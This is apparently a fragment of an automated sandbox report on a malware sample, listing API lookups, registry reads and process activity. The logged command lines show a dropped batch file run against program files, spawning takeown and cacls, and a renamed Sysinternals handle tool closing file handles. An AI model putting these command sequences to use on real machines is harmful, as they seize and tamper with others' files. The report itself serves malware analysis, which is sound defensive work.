| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75efea20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75ea5530 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x75ea4eb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x75ea4c20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77bef630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x75eff0e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x761cee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x761cf910 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x761c8c80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x761cffa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x761cefb0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x761cf530 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x761ce5a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x761ce580 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x761cf460 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x761cf9b0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x761ced60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x761cf100 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x75106b00 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x75b747e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x75b74f70 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x75b74ef0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x75b73c10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x75b75c60 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x75b74810 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74b807d0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x74b8e6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x74b79080 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74b9ab40 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x74b83570 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x74ba09b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x74ba2bec |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x74b7d0c0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x74b793b0 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x744a1590 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x744a1510 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x744a1570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x75ea4ae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x75ea4b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75ea4b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75ea4b40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75efebc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75efeb20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75efeb80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x75ea6700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x75ea6d30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77bfd7c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77bfb840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77bfb740 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75ea6d70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77bfc0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77bfbe10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77c22b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77c18e50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77c152f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x75ea71b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75ea4510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7500d900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x75ea49a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x75ea7050 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75ea7760 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x75ea7190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x75ea7780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x75ea72c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x75ea7440 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75ea7480 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f9e260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75ea0db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x75ea5a20 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-04-17 10:41:30 (UTC) |
|
1 | |
| Get Time | type = Performance Ctr, time = 24261186499 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #127: mxkefu6a64.exe
68
0
| Information | Value |
|---|---|
| ID | #127 |
| File Name | c:\users\fd1hvy\appdata\local\temp\mxkefu6a64.exe |
| Command Line | mxkeFu6a.exe -accepteula -c -y -p handles -nobanner |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:01, Reason: Child Process |
| Unmonitor | End Time: 00:03:27, Reason: Self Terminated |
| Monitor Duration | 00:00:26 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x12e4 |
| Parent PID | 0x1244 (c:\users\fd1hvy\desktop\mxkefu6a.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
12F8
0x
1320
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| mxkefu6a64.exe | 0x140000000 | 0x140045FFF | Process Termination | - | 64-bit | - |
|
|
|
Host Behavior
File (18)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 101 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 58 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 138 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 85 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 56 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 69 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 74 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 78 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 72 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 49 |
|
1 |
Registry (7)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals | value_name = EulaAccepted, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1 |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Module (38)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ff92fdd0000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\fd1hvy\appdata\local\temp\mxkefu6a64.exe, file_name_orig = C:\Users\FD1HVy\AppData\Local\Temp\mxkeFu6a64.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | address_out = 0x7ff92fdee1a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x7ff92fdee4e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x7ff92fde4710 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x7ff92fdebcd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x7ff92fdf1fb0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventExW, address_out = 0x7ff92fdf1f10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x7ff92fdf1f70 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7ff92fdee1e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7ff92fdeb200 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x7ff931f83770 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7ff931f80f10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7ff931f809e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x7ff92fdee6e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolWait, address_out = 0x7ff931f80ff0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7ff931f808e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x7ff931fe6fa0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x7ff931fc51c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x7ff931fe99c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7ff92fdee2c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x7ff92fe06b80 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7ff92f228b70 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7ff92fe06d50 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CompareStringEx, address_out = 0x7ff92fde8f30 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetDateFormatEx, address_out = 0x7ff92fe06e90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7ff92fdec1d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTimeFormatEx, address_out = 0x7ff92fe070a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7ff92fdee3b0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidLocaleName, address_out = 0x7ff92fe071d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x7ff92fde62d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentPackageId, address_out = 0x7ff92f1bf2e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount64, address_out = 0x7ff92fde5eb0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsWow64Process, address_out = 0x7ff92fdec1b0 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #128: cmd.exe
300
0
| Information | Value |
|---|---|
| ID | #128 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\FD1HVy\Desktop\c7356Qly.bat" "C:\Program Files\rempl\does.exe"" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:02, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:23 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe60 |
| Parent PID | 0xfc8 (c:\users\fd1hvy\desktop\m.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
101C
0x
12E8
|
Host Behavior
File (227)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\FD1HVy\Desktop\c7356Qly.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
32 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | - | type = file_type |
|
3 | |
| Open | STD_OUTPUT_HANDLE | - |
|
112 | |
| Open | STD_INPUT_HANDLE | - |
|
11 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
12 | |
| Write | STD_OUTPUT_HANDLE | size = 24 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 53 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 15 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 31 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 80, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\cacls.exe | os_pid = 0x1398, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\WINDOWS\system32\takeown.exe | os_pid = 0x106c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (43)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
12 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
5 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
6 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = FD1HVy |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "does.exe" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 | |
| Set Environment String | name = FN, value = "does.exe" |
|
1 |
Process #130: cmd.exe
300
0
| Information | Value |
|---|---|
| ID | #130 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\FD1HVy\Desktop\c7356Qly.bat" "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui"" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:07, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:18 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd64 |
| Parent PID | 0xfc8 (c:\users\fd1hvy\desktop\m.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B84
0x
4A0
|
Host Behavior
File (227)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\FD1HVy\Desktop\c7356Qly.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
32 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | - | type = file_type |
|
3 | |
| Open | STD_OUTPUT_HANDLE | - |
|
112 | |
| Open | STD_INPUT_HANDLE | - |
|
11 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
12 | |
| Write | STD_OUTPUT_HANDLE | size = 24 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 58 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 22 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 31 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 60 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
